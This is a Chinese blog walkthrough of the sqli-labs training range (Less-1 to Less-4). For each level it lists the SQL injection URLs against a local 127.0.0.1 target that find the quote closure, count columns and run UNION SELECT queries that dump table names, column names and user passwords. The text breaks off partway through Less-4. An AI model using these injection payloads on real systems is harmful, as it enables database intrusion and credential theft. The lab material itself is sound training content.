sqli-labs靶场通关攻略_sqilabs靶场如何确定闭合方式-CSDN博客

本文链接：https://blog.csdn.net/2301_80402555/article/details/141198223

Less-1

第一步、搭建环境，使用版本为5.4.45的PHP

第二步、打开Less-1

根据已知条件，确定使用ID作为参数

第三步、判断闭合方式

发现闭合方式为' --+

http://127.0.0.1/Less-1/?id=1' --+

第四步、使用order by判断字段列数

http://127.0.0.1/Less-1/?id=1' order by 1 --+

http://127.0.0.1/Less-1/?id=1' order by 2 --+

http://127.0.0.1/Less-1/?id=1' order by 3 --+

http://127.0.0.1/Less-1/?id=1' order by 4 --+ 页面不正常说明存在3列

第五步、使用联合查询，可以查找页面回显点

页面显示的是id=1的数据，没有显示联合查询的数据，把页面前面查询的id的数据改成不存在的，比如-1，即可显示

http://127.0.0.1/Less-1/?id=-1' union select 1,2,3 --+

第六步、使用联合查询，查询数据库和用户名

http://127.0.0.1/Less-1/?id=-1' union select 1,database(),user() --+

第七步、使用联合查询，查询网站的security数据库里所有表名

http://127.0.0.1/Less-1/?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

第八步、使用联合查询，查询users列表所有列

http://127.0.0.1/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

第九步、查询表中所有数据

http://127.0.0.1/Less-1/?id=-1' union select 1,2,group_concat(id,'~',username,'~',password) from users --+

Less-2

第一步、打开Less-2

第二步、判断闭合方式

判断闭合方式为数字型

第三步、使用order by 判断字段列数

http://127.0.0.1/Less-2/?id=1 order by 1 --+

http://127.0.0.1/Less-2/?id=1 order by 2 --+

http://127.0.0.1/Less-2/?id=1 order by 3 --+

http://127.0.0.1/Less-2/?id=1 order by 4 --+ 页面不正常说明存在3列

第四步、使用联合查询，可以查找页面回显点

页面显示的是id=1的数据，没有显示联合查询的数据，把页面前面查询的id的数据改成不存在的，比如-1，即可显示

http://127.0.0.1/Less-2/?id=-1 union select 1,2,3 --+

第五步、使用联合查询，查询数据库和用户名

http://127.0.0.1/Less-2/?id=-1 union select 1,database(),user() --+

第六步、使用联合查询，查询网站的security数据库里所有表名

http://127.0.0.1/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

第七步、使用联合查询，查询users列表所有列

http://127.0.0.1/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

第八步、查询表中所有数据

http://127.0.0.1/Less-2/?id=-1 union select 1,2,group_concat(id,'~',username,'~',password) from users --+

Less-3

第一步、打开Less-3

第二步、判断闭合方式

判断闭合方式为字符型

第三步、使用order by 判断字符段数

http://127.0.0.1/Less-3/?id=1') order by 1 --+

http://127.0.0.1/Less-3/?id=1') order by 2 --+

http://127.0.0.1/Less-3/?id=1') order by 3 --+

http://127.0.0.1/Less-3/?id=1') order by 4 --+ 页面不正常说明存在3列

第四步、使用联合查询，可以查找页面回显点

页面显示的是id=1的数据，没有显示联合查询的数据，把页面前面查询的id的数据改成不存在的，比如-1，即可显示

http://127.0.0.1/Less-3/?id=-1') union select 1,2,3 --+

第五步、使用联合查询，查询数据库和用户名

http://127.0.0.1/Less-3/?id=-1') union select 1,database(),user() --+

第六步、使用联合查询，查询网站的security数据库里所有表名

http://127.0.0.1/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

第七步、使用联合查询，查询users列表所有列

http://127.0.0.1/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

第八步、查询表中所有数据

http://127.0.0.1/Less-3/?id=-1') union select 1,2,group_concat(id,'~',username,'~',password) from users --+

Less-4

第一步、打开Less-4

第二步、判断闭合方式

第三步、使用order by 判断字符段数

http://127.0.0.1/Less-4/?id=1") order by 1 --+

http://127.0.0.1/Less-4/?id=1") order by 2 --+

http://127.0.0.1/Less-4/?id=1") order by 3 --+

http://127.0.0.1/Less-4/?id=1") order by 4 --+ 页面不正常说明存在3列

第四步、使用联合查询，可以查找页面回显点

页面显示的是id=1的数据，没有显示联合查询的数据，把页面前面查询的id的数据改成不存在的，比如-1，即可显示

http://127.0.0.1/Less-4/?id=-1"） union select 1,2,3 --+

第五步、使用联合查询，查询数据库和用户名

http://127.0.0.1/Less-4/?id=-1") union select 1,database(),user() --+

第六步、使用联合查询，查询网站的security数据库里所有表名

http://127.0.0.1/Less-4/?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

第七步、使用联合查询，查询users列表所有列

http://127.0.0.1/Less-4/?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+